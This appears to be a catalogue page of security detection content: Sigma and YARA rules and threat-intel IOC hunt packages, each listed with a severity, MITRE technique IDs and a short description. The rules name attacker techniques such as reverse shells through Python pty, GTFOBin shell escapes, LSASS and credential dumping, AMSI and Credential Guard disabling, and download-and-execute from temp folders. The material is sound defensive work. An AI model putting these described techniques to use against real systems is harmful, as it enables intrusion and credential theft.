ThreatFox: Quasar RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 9 IOCs associated with Remcos
ThreatFox: SocksProxyGo IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
Hunt package for 4 IOCs associated with SocksProxyGo
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with XWorm
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 46 malicious URLs tagged as 32-bit
URLhaus: ACRStealer Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 32 malicious URLs tagged as ACRStealer
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as Mozi
T1078
imAuthentication
'This query searches for successful user logins from different countries within 3 hours. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimAu
WindowsPE
yara low
YARA rule: WindowsPE
T1059.006T1027.010
imProcessCreate
Detects the use of Python's base64 decoding functions in command line executions on Linux systems. Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is
BloodHound Collection Files
sigma high
T1087.001T1087.002T1482T1069.001T1069.002T1059.001
imFileEvent
Detects default file names outputted by the BloodHound collection tool SharpHound
OpenEDR Spawning Command Shell
sigma medium
T1059.003T1021.004T1219
imProcessCreate
Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities. This may indicate remote command execution through OpenEDR's remote mana
T1105T1570T1219
imFileEvent
Detects the creation of potentially suspicious files by OpenEDR's ITSMService process. The ITSMService is responsible for remote management operations and can create files on the system through the Pr
T1574.001
DeviceImageLoadEvents
Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.
System File Execution Location Anomaly
sigma high
T1036
imProcessCreate
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
T1036.005
imFileEvent
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using
T1195.002T1557
imProcessCreate
Detects suspicious child process creation by the Notepad++ updater process (gup.exe). This could indicate potential exploitation of the updater component to deliver unwanted malware.
T1195.002T1557
imFileEvent
Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations. This could indicate potential exploitation of the updater component to deliver unwanted malware or unwar
Windows Vulnerable Driver Blocklist Disabled
sigma high
T1562.001
imRegistry
Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers, and its modification may indicate an attempt to
Capabilities Discovery - Linux
sigma low
T1083
imProcessCreate
Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
Creation Of Non-Existent System DLL
sigma medium
T1574.001
imFileEvent
Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. Phantom DLL hijacking invol
T1548T1554
imProcessCreate
Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs
T1548T1554
imProcessCreate
Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs)
T1112T1574.001
imRegistry
Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings. Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious
Suspicious Shell Open Command Registry Modification
sigma medium
T1548.002T1546.001
imRegistry
Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence. Generally, modifications to the `*\shell\open\command` registry key can
HackTool - WSASS Execution
sigma high
T1003.001
imProcessCreate
Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's (Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.
T1003T1562.001
DeviceImageLoadEvents
Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories. These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes o
Modify User Shell Folders Startup Value
sigma high
T1547.001
imRegistry
Detect modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts. Attackers may modify User Shell Folders registry keys to point to
Suspicious Package Installed - Linux
sigma medium
T1553.004
imProcessCreate
Detects installation of suspicious packages using system installation utilities
Windows Credential Guard Disabled - Registry
sigma high
T1562.001
imRegistry
Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can
T1562.001
imRegistry
Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can acc
AMSI Disabled via Registry Modification
sigma high
T1562.001T1562.006
imRegistry
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value. Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications
T1218T1105
imFileEvent
Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution. Adversaries may leverage legitimate applica
Malicious PowerShell Scripts - FileCreation
sigma high
T1059.001
imFileEvent
Detects the creation of known offensive powershell scripts used for exploitation
CredUI.DLL Loaded By Uncommon Process
sigma medium
T1056.002
DeviceImageLoadEvents
Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
Desktop.INI Created by Uncommon Process
sigma medium
T1547.009
imFileEvent
Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
T1486T1562.001
DeviceImageLoadEvents
Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (
Creation of WerFault.exe/Wer.dll in Unusual Folder
sigma medium
T1574.001
imFileEvent
Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
T1574.001
DeviceImageLoadEvents
Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
T1490
DeviceImageLoadEvents
Detects the image load of VSS DLL by uncommon executables
Potentially Suspicious WDAC Policy File Creation
sigma medium
imFileEvent
Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicio
Startup Folder File Write
sigma medium
T1547.001
imFileEvent
A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
T1552T1005T1059.004
imProcessCreate
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,
T1552T1005T1059.007
imProcessCreate
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,
Suspicious ArcSOC.exe Child Process
sigma high
T1059T1203
imProcessCreate
Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe. ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromise
Suspicious File Created by ArcSOC.exe
sigma high
T1127T1105T1133
imFileEvent
Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS server, creates a file with suspicious file type, indicating that it may be an executable,
T1082
imProcessCreate
Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
T1059.004T1027
imFileEvent
Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigg
Network Connection Initiated via Finger.EXE
sigma high
T1071.004T1059.003
imNetworkSession
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged t
Office Macro File Download
sigma low
T1566.001
imFileEvent
Detects the creation of a new office macro files on the system via an application (browser, mail client). This can help identify potential malicious activity, such as the download of macro-enabled doc
Cred Dump Tools Dropped Files
sigma high
T1003.001T1003.002T1003.003T1003.004T1003.005
imFileEvent
Files with well-known filenames (parts of credential dump software or files produced by them) creation
Suspicious File Write to Webapps Root Directory
sigma medium
T1505.003T1190
imFileEvent
Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells o
File Access Of Signal Desktop Sensitive Data
sigma medium
T1003
imRegistry
Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the co
BaaUpdate.exe Suspicious DLL Load
sigma high
T1218T1021.003
DeviceImageLoadEvents
Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM &
T1562.001
imProcessCreate
Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator,
Audit Rules Deleted Via Auditctl
sigma high
T1562.012
imProcessCreate
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable
T1204.002
imFileEvent
Detects the creation of files with an executable or script extension by an Office application.
Mask System Power Settings Via Systemctl
sigma high
T1653
imProcessCreate
Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or
imNetworkSession
Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
T1203
imNetworkSession
Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42
Python WebServer Execution - Linux
sigma medium
T1048.003
imProcessCreate
Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a w
T1490
DeviceImageLoadEvents
Detects the image load of VSS DLL by uncommon executables
Suspicious WSMAN Provider Image Loads
sigma medium
T1059.001T1021.003
DeviceImageLoadEvents
Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
T1070.002
imProcessCreate
Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
Suspicious Startup Folder Persistence
sigma high
T1204.002T1547.001
imFileEvent
Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. These files (.ps1, .vbs, .js, .bat,
Amsi.DLL Loaded Via LOLBIN Process
sigma medium
DeviceImageLoadEvents
Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
Potential Antivirus Software DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
Potential DLL Sideloading Of DBGHELP.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "dbghelp.dll"
Potential Goopdate.DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
PowerShell Core DLL Loaded By Non PowerShell Process
sigma medium
T1059.001
DeviceImageLoadEvents
Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.
imFileEvent
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
PSScriptPolicyTest Creation By Uncommon Process
sigma medium
imFileEvent
Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
Windows Binaries Write Suspicious Extensions
sigma high
T1036
imFileEvent
Detects Windows executables that write files with suspicious extensions
Potential DLL Sideloading Of DBGCORE.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects DLL sideloading of "dbgcore.dll"
Linux Sudo Chroot Execution
sigma low
T1068
imProcessCreate
Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute comman
PUA - TruffleHog Execution
sigma medium
T1083T1552.001
imProcessCreate
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende
PUA - TruffleHog Execution - Linux
sigma medium
T1083T1552.001
imProcessCreate
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende
Potential Persistence Via Notepad++ Plugins
sigma medium
imFileEvent
Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
Python Image Load By Non-Python Process
sigma low
T1027.002
DeviceImageLoadEvents
Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code. Various tools like Py2Exe, PyInstaller, a
Potentially Suspicious Execution From Tmp Folder
sigma medium
T1036
imProcessCreate
Detects a potentially suspicious execution of a process located in the '/tmp/' folder
Potential Hello-World Scraper Botnet Activity
sigma medium
T1595
imWebSession
Detects network traffic potentially associated with a scraper botnet variant that uses the "Hello-World/1.0" user-agent string.
T1567T1572T1102
imNetworkSession
Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with suc
T1190T1505.003
imFileEvent
Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. This behavior has been observed in the exploitation of SharePoint vulnerabil
Suspicious Double Extension Files
sigma high
T1036.007
imFileEvent
Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
T1566.001
imFileEvent
Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use suspic
WinRAR Creating Files in Startup Locations
sigma high
T1547.001
imFileEvent
Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. This kind of behaviour has been asso
T1490
DeviceImageLoadEvents
Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. It is often abused by attackers to
T1087.002T1069.002T1482
imFileEvent
Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data
ADS Zone.Identifier Deleted By Uncommon Application
sigma medium
T1070.004
imFileEvent
Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
Potential Binary Or Script Dropper Via PowerShell
sigma medium
imFileEvent
Detects PowerShell creating a binary executable or a script file.
T1059.004T1203
imProcessCreate
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution
T1574.007T1548.002
DeviceImageLoadEvents
Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. This technique tricks Windows into treat
Access of Sudoers File Content
sigma medium
T1592.004
imProcessCreate
Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
Local Groups Discovery - Linux
sigma low
T1069.001
imProcessCreate
Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
T1204T1059.007T1105
imFileEvent
Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. This behavior may indicate an attempt to execute remotely hosted, potential
T1555.003T1217
imFileEvent
Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. Adversaries may attempt to access browser credential storage to extract
HackTool - Impacket File Indicators
sigma high
T1003.001
imFileEvent
Detects file creation events with filename patterns used by Impacket.
Potential DLL Sideloading Of MsCorSvc.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "mscorsvc.dll".
Suspicious Binary Writes Via AnyDesk
sigma high
T1219.002
imFileEvent
Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a l
T1102
imNetworkSession
Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
T1036.002
imFileEvent
Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
MMC Loading Script Engines DLLs
sigma medium
T1059.005T1218.014
DeviceImageLoadEvents
Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt to execute malicious scripts within a trusted system process for
WCE wceaux.dll Access
sigma critical
T1003
imRegistry
Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
T1204
imFileEvent
Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
T1059
DeviceImageLoadEvents
Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.
Exploit Framework User Agent
sigma high
T1071.001
imWebSession
Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
Shell Execution via Rsync - Linux
sigma high
T1059
imProcessCreate
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Suspicious Invocation of Shell via Rsync
sigma high
T1059T1203
imProcessCreate
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This beh
Potential Secure Deletion with SDelete
sigma medium
T1070.004T1027.005T1485T1553.002
imRegistry
Detects files that have extensions commonly seen while SDelete is used to wipe files.
Local System Accounts Discovery - Linux
sigma low
T1087.001
imProcessCreate
Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
File and Directory Discovery - Linux
sigma low
T1083
imProcessCreate
Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
imProcessCreate
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
Python Spawning Pretty TTY Via PTY Module
sigma medium
T1059
imProcessCreate
Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
.RDP File Created By Uncommon Application
sigma high
imFileEvent
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
T1102T1102.001
imNetworkSession
Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous at
LSASS Process Memory Dump Files
sigma high
T1003.001
imFileEvent
Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
Linux HackTool Execution
sigma high
T1587
imProcessCreate
Detects known hacktool execution based on image name.
T1046
imProcessCreate
Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
Network Connection Initiated To BTunnels Domains
sigma medium
T1567T1572
imNetworkSession
Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Capsh Shell Invocation - Linux
sigma high
T1059
imProcessCreate
Detects the use of the "capsh" utility to invoke a shell.
T1059
imProcessCreate
Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
Shell Execution GCC - Linux
sigma high
T1083
imProcessCreate
Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Execution via Find - Linux
sigma high
T1083
imProcessCreate
Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
Shell Execution via Flock - Linux
sigma high
T1083
imProcessCreate
Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Execution via Git - Linux
sigma high
T1059
imProcessCreate
Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Execution via Nice - Linux
sigma high
T1083
imProcessCreate
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Shell Invocation via Apt - Linux
sigma medium
T1083
imProcessCreate
Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro
Shell Invocation via Env Command - Linux
sigma high
T1059
imProcessCreate
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
T1059
imProcessCreate
Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate pri
Vim GTFOBin Abuse - Linux
sigma high
T1083
imProcessCreate
Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro
Shell Invocation Via Ssh - Linux
sigma high
T1059
imProcessCreate
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
T1003
imFileEvent
Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.
T1552.006
imFileEvent
Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
T1555.004
imFileEvent
Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" fun
T1555.004
imFileEvent
Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::m
Credential Manager Access By Uncommon Applications
sigma medium
T1003
imFileEvent
Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi
T1528
imFileEvent
Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
Potential DLL Sideloading Of DbgModel.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "DbgModel.dll"
Anydesk Temporary Artefact
sigma medium
T1219.002
imFileEvent
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
T1218
imNetworkSession
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually i
T1102T1102.001
imNetworkSession
Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
Potential DLL Sideloading Of MpSvc.DLL
sigma medium
T1574.001
DeviceImageLoadEvents
Detects potential DLL sideloading of "MpSvc.dll".
PDF File Created By RegEdit.EXE
sigma high
imFileEvent
Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensit
T1562.001
imRegistry
Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker t
HackTool - CrackMapExec File Indicators
sigma high
T1003.001
imFileEvent
Detects file creation events with filename patterns used by CrackMapExec.
HackTool - Inveigh Execution Artefacts
sigma critical
T1219.002
imFileEvent
Detects the presence and execution of Inveigh via dropped artefacts
HackTool - Mimikatz Kirbi File Creation
sigma critical
T1558
imFileEvent
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
HackTool - NPPSpy Hacktool Usage
sigma high
imFileEvent
Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
sigma high
T1003
imFileEvent
Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
HackTool - Powerup Write Hijack DLL
sigma high
T1574.001
imFileEvent
Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies o
HackTool - QuarksPwDump Dump File
sigma critical
T1003.002
imFileEvent
Detects a dump file written by QuarksPwDump password dumper
T1219.002
imFileEvent
Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
HackTool - SafetyKatz Dump Indicator
sigma high
T1003.001
imFileEvent
Detects default lsass dump filename generated by SafetyKatz.
T1552.001
imFileEvent
Detects files written by the different tools that exploit HiveNightmare
T1555T1552.004
imFileEvent
Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
Files With System DLL Name In Unsuspected Locations
sigma medium
T1036.005
imFileEvent
Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to
T1572T1090T1102
imNetworkSession
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have
T1572T1090T1102
imNetworkSession
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have
Network Communication Initiated To Portmap.IO Domain
sigma medium
T1041T1090.002
imNetworkSession
Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
Network Connection Initiated By Eqnedt32.EXE
sigma high
T1203
imNetworkSession
Detects network connections from the Equation Editor process "eqnedt32.exe".
Network Connection Initiated To Mega.nz
sigma low
T1567.002
imNetworkSession
Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
T1218.003
imNetworkSession
Detects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
T1105
imNetworkSession
Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
T1567T1572
imNetworkSession
Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
imFileEvent
Detects the creation of files with scripting or executable extensions by Mysql daemon. Which could be an indicator of "User Defined Functions" abuse to download malware.
T1571
imNetworkSession
Detects programs that connect to known malware callback ports based on threat intelligence reports.
T1071.001
imNetworkSession
Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Win
T1218.009
imNetworkSession
Detects "RegAsm.exe" initiating a network connection to public IP adresses
Pnscan Binary Data Transmission Activity
sigma medium
T1046
imProcessCreate
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker
Malware User Agent
sigma high
T1071.001
imWebSession
Detects suspicious user agent strings used by malware in proxy logs
EVTX Created In Uncommon Location
sigma medium
T1562.002
imFileEvent
Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or si
T1016
imNetworkSession
Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
Microsoft VBA For Outlook Addin Loaded Via Outlook
sigma medium
T1204.002
DeviceImageLoadEvents
Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
RDP Over Reverse SSH Tunnel
sigma high
T1572T1021.001
imNetworkSession
Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
Failed Logon From Public IP
sigma medium
T1078T1190T1133
imAuthentication
Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
T1133
imProcessCreate
Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incom
APT User Agent
sigma high
T1071.001
imWebSession
Detects suspicious user agent strings used in APT malware in proxy logs
HackTool - BabyShark Agent Default URL Pattern
sigma critical
T1071.001
imWebSession
Detects Baby Shark C2 Framework default communication patterns
PUA - Advanced IP/Port Scanner Update Check
sigma medium
T1590
imWebSession
Detect the update check performed by Advanced IP/Port Scanner utilities.
T1021.001
imNetworkSession
Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling tha
T1218
imFileEvent
Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Att
T1567T1568.002T1572T1090T1102
imNetworkSession
Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communicatio
Network Connection Initiated Via Notepad.EXE
sigma high
T1055
imNetworkSession
Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network co
Uncommon Connection to Active Directory Web Services
sigma medium
T1087
imNetworkSession
Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
Prefetch File Deleted
sigma high
T1070.004
imFileEvent
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
T1496
imNetworkSession
Detects initiated network connections to crypto mining pools
T1587.001
imFileEvent
Detects the creation of a file with an uncommon extension in an Office application startup folder
Suspicious Executable File Creation
sigma high
T1564
imFileEvent
Detect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
imFileEvent
